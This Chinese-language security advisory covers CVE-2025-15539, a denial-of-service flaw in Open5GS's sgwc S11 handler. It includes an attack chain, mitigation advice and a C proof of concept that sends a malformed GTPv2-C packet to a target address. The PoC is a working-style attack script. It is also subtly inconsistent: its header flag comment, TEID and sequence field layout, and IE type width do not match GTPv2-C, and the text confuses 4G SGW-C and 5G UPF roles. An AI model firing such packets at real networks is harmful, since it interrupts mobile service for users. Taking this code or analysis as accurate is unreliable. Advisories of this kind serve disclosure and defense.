Open5GS sgwc组件拒绝服务漏洞 (CVE-2025-15539)

漏洞信息

漏洞编号

CVE-2025-15539

漏洞类型

拒绝服务

CVSS评分

5.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Open5GS

漏洞概述

CVE-2025-15539是影响Open5GS项目的一个中危拒绝服务漏洞。该漏洞存在于Open5GS的sgwc( Serving Gateway Control )组件中，具体位于src/sgwc/s11-handler.c文件的sgwc_s11_handle_downlink_data_notification_ack函数。攻击者可以通过构造特定的网络请求触发该漏洞，导致服务进程崩溃或资源耗尽，从而造成拒绝服务。该漏洞的CVSS评分为5.3，属于中等严重程度，攻击向量为网络远程攻击，无需认证和用户交互即可利用。漏洞已于2026年1月19日披露，目前已有官方修复补丁(b4707272c1caf6a7d4dca905694ea55557a0545f)，建议受影响的用户尽快升级到最新版本以修复该问题。Open5GS是一个开源的5G核心网络实现，被广泛应用于5G网络研究和部署场景。

技术细节

该漏洞位于Open5GS的SGWC(Serving Gateway Control)组件中，具体受影响的函数是sgwc_s11_handle_downlink_data_notification_ack。该函数在处理下行数据通知确认(S11接口消息)时存在缺陷。攻击者可以通过向SGWC组件发送特制的S11接口消息，触发该函数中的异常处理逻辑错误。当函数接收到特定构造的下行数据通知确认消息时，可能会导致内存访问错误、空指针引用或断言失败，最终导致sgwc进程崩溃。由于S11接口是GTPv2-C协议的核心接口，攻击者可以在不进行认证的情况下远程触发该漏洞。该漏洞影响所有使用Open5GS sgwc组件的部署场景，特别是在5G网络中作为用户面功能(UPF)的控制平面组件。修复补丁针对该函数的输入验证和错误处理逻辑进行了改进，增加了必要的空指针检查和边界验证。

攻击链分析

STEP 1

步骤1

攻击者识别目标Open5GS部署的SGWC组件IP地址和S11接口端口(默认2123)

STEP 2

步骤2

攻击者构造特制的GTPv2-C下行数据通知确认消息，设置无效的IE类型和超长长度值

STEP 3

步骤3

攻击者通过UDP协议向目标SGWC组件的S11接口发送恶意构造的数据包

STEP 4

步骤4

SGWC组件的sgwc_s11_handle_downlink_data_notification_ack函数处理该消息时触发内存访问异常

STEP 5

步骤5

由于缺少适当的输入验证和错误处理，导致sgwc进程崩溃或进入不可用状态

STEP 6

步骤6

5G用户面功能(UPF)失去与SGWC的控制平面连接，无法正常处理用户数据，造成网络服务中断

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

/*
 * CVE-2025-15539 PoC - Open5GS sgwc DoS
 * Target: Open5GS sgwc_s11_handle_downlink_data_notification_ack
 * This PoC demonstrates sending a malformed S11 GTPv2-C message
 * to trigger the denial of service condition.
 * 
 * Note: This is for educational and authorized testing purposes only.
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>

// GTPv2-C Message Types
#define GTP2C_DOWNLINK_DATA_NOTIFICATION_ACK 0xBF

// GTPv2-C Header Structure
typedef struct {
    uint8_t flags;
    uint8_t message_type;
    uint16_t length;
    uint32_t teid;
    uint32_t sequence;
    uint8_t spare[2];
} __attribute__((packed)) gtp2c_header_t;

// Malformed IE for triggering the vulnerability
typedef struct {
    uint16_t type;
    uint16_t length;
    uint8_t value[4];
} __attribute__((packed)) ie_t;

void send_malformed_packet(const char *target_ip, int port) {
    int sock = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
    if (sock < 0) {
        perror("Socket creation failed");
        return;
    }

    struct sockaddr_in target;
    memset(&target, 0, sizeof(target));
    target.sin_family = AF_INET;
    target.sin_port = htons(port);
    inet_pton(AF_INET, target_ip, &target.sin_addr);

    // Construct malformed GTPv2-C packet
    unsigned char packet[256];
    memset(packet, 0, sizeof(packet));

    gtp2c_header_t *hdr = (gtp2c_header_t *)packet;
    hdr->flags = 0x40;  // Version 1, no TEID present
    hdr->message_type = GTP2C_DOWNLINK_DATA_NOTIFICATION_ACK;
    hdr->length = htons(12);  // Minimal length
    hdr->teid = 0;
    hdr->sequence = htonl(0x000001);

    // Malformed IE that triggers the vulnerability
    ie_t *ie = (ie_t *)(packet + sizeof(gtp2c_header_t));
    ie->type = 0x00;  // Invalid IE type
    ie->length = htons(0xFFFF);  // Oversized length
    memset(ie->value, 0xFF, 4);

    printf("[*] Sending malformed GTPv2-C packet to %s:%d\n", target_ip, port);
    printf("[*] Message Type: 0x%02X (DOWNLINK_DATA_NOTIFICATION_ACK)\n", 
           GTP2C_DOWNLINK_DATA_NOTIFICATION_ACK);
    
    int sent = sendto(sock, packet, sizeof(packet), 0, 
                      (struct sockaddr *)&target, sizeof(target));
    printf("[*] Sent %d bytes\n", sent);
    
    close(sock);
}

int main(int argc, char *argv[]) {
    if (argc < 3) {
        printf("Usage: %s <target_ip> <port>\n", argv[0]);
        printf("Example: %s 192.168.1.100 2123\n", argv[0]);
        return 1;
    }
    
    send_malformed_packet(argv[1], atoi(argv[2]));
    return 0;
}

影响范围

Open5GS < 2.7.7

防御指南

临时缓解措施

如果无法立即升级，可采取以下临时缓解措施：1) 在网络边界配置ACL规则，限制对SGWC组件S11接口(UDP端口2123)的访问，仅允许受信任的控制平面组件访问；2) 部署网络入侵检测系统监控异常的GTPv2-C消息，对异常流量进行告警和阻断；3) 启用Open5GS的详细日志记录，监控sgwc_s11_handle_downlink_data_notification_ack函数的异常调用；4) 考虑使用负载均衡器或高可用集群部署SGWC组件，提高系统的容错能力。但这些措施仅为临时缓解，不能完全替代安全更新，建议尽快应用官方修复补丁。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-15539
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-15539
3 Details https://www.cvedetails.com/cve/CVE-2025-15539/
4 VulDB https://vuldb.com/cve/CVE-2025-15539
5 Link https://github.com/open5gs/open5gs/
6 Link https://github.com/open5gs/open5gs/commit/b4707272c1caf6a7d4dca905694ea55557a0545f
7 Link https://github.com/open5gs/open5gs/issues/4230
8 Link https://github.com/open5gs/open5gs/issues/4230#issue-3774173079
9 Link https://vuldb.com/?ctiid.341732
10 Link https://vuldb.com/?id.341732
11 Link https://vuldb.com/?submit.735339